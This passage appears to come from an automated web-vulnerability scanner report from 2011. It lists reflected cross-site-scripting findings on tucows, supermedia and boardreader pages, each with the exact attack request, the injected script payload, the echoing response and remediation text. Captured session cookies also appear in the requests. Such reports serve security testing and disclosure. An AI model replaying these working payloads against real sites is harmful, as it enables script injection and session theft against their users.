Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:55 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32397

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/themes/03BlueMeanyc3a9a"-alert(1)-"237aaaa614c/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.34. http://advertise.tucows.com/includes/themes/03BlueMeany/style.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/themes/03BlueMeany/style.css

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9f64"-alert(1)-"4bb4721a55e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/themes/03BlueMeany/style.cssa9f64"-alert(1)-"4bb4721a55e HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:57:07 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/themes/03BlueMeany/style.cssa9f64"-alert(1)-"4bb4721a55e";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.35. http://advertise.tucows.com/includes/themes/03BlueMeany/styles.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/themes/03BlueMeany/styles.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86915"-alert(1)-"a2383cc0931 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes86915"-alert(1)-"a2383cc0931/themes/03BlueMeany/styles.css HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:23 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32985

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes86915"-alert(1)-"a2383cc0931/themes/03BlueMeany/styles.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.36. http://advertise.tucows.com/includes/themes/03BlueMeany/styles.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/themes/03BlueMeany/styles.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 942cd"-alert(1)-"ffd8d4c4a27 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/themes942cd"-alert(1)-"ffd8d4c4a27/03BlueMeany/styles.css HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:31 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32001

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/themes942cd"-alert(1)-"ffd8d4c4a27/03BlueMeany/styles.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.37. http://advertise.tucows.com/includes/themes/03BlueMeany/styles.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/themes/03BlueMeany/styles.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17188"-alert(1)-"4251e1c163 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/themes/03BlueMeany17188"-alert(1)-"4251e1c163/styles.css HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:46 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 31910

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/themes/03BlueMeany17188"-alert(1)-"4251e1c163/styles.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.38. http://advertise.tucows.com/includes/themes/03BlueMeany/styles.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/themes/03BlueMeany/styles.css

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eac0c"-alert(1)-"7fb6f8e43f1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/themes/03BlueMeany/styles.csseac0c"-alert(1)-"7fb6f8e43f1 HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:55 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32545

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/themes/03BlueMeany/styles.csseac0c"-alert(1)-"7fb6f8e43f1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.39. http://blog.supermedia.com/comment_html.php [cid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /comment_html.php

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 791b3</script><script>alert(1)</script>95b6769fb51 was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /comment_html.php?cid=791b3</script><script>alert(1)</script>95b6769fb51 HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:38 GMT
Server: Unspecified
Content-Length: 101
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:38 GMT;path=/

<script type="text/javascript">alert("791b3</script><script>alert(1)</script>95b6769fb51");</script>

3.40. http://boardreader.com/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2e1f"><script>alert(1)</script>3606575b7cc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /index.php?z=1&source=opensearch&a=s&q={searchTerms}&b2e1f"><script>alert(1)</script>3606575b7cc=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;

Response (redirected)

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 20:52:49 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

           
                                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://boardreader.com/rss/%7BsearchTerms%7D.html?source=opensearch&b2e1f"><script>alert(1)</script>3606575b7cc=1&p=20&format=RSS2.0" />
...[SNIP]...

3.41. http://boardreader.com/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2d10e'><script>alert(1)</script>2f96e732bb6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /index.php?z=1&source=opensearch&a=s&q={searchTerms}&2d10e'><script>alert(1)</script>2f96e732bb6=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;

Response (redirected)

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 20:53:00 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

           
                                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta
...[SNIP]...
<input type=hidden name='2d10e'><script>alert(1)</script>2f96e732bb6' value="1">
...[SNIP]...

3.42. http://boardreader.com/my/signup.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /my/signup.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da9f2"><script>alert(1)</script>671f469cc02 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /my/signup.html?da9f2"><script>alert(1)</script>671f469cc02=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 20:31:38 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
<form name="mylogin_" action="/my/signup.html?da9f2"><script>alert(1)</script>671f469cc02=1" method="POST">
...[SNIP]...

3.43. http://boardreader.com/pop/articles/-/-/7.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /pop/articles/-/-/7.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37ec4"><script>alert(1)</script>e3800dfbbbc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pop/articles/-/-/7.html?37ec4"><script>alert(1)</script>e3800dfbbbc=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 20:32:07 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
<a class="disc" href="/s/Toilet%2Bpaper%2Borientation.html?37ec4"><script>alert(1)</script>e3800dfbbbc=1" title="Search discussions for item &quot;Toilet paper orientation&quot;">
...[SNIP]...

3.44. http://boardreader.com/pop/films/-/-/3.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /pop/films/-/-/3.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef06b"><script>alert(1)</script>06db0769bba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pop/films/-/-/3.html?ef06b"><script>alert(1)</script>06db0769bba=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 20:31:56 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
<a class="disc" href="/s/D.html?ef06b"><script>alert(1)</script>06db0769bba=1" title="Search discussions for item &quot;D&quot;">
...[SNIP]...

3.45. http://boardreader.com/pop/instructions/-/-/7.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /pop/instructions/-/-/7.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a5f8"><script>alert(1)</script>69f17f800bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pop/instructions/-/-/7.html?9a5f8"><script>alert(1)</script>69f17f800bf=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 20:31:57 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
<a class="disc" href="/s/How%2Bto%2BBuild%2Ban%2BEarthbag%2BDome.html?9a5f8"><script>alert(1)</script>69f17f800bf=1" title="Search discussions for item &quot;How to Build an Earthbag Dome&quot;">
...[SNIP]...

3.46. http://boardreader.com/pop/news/-/-/3.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /pop/news/-/-/3.html

Issue detail

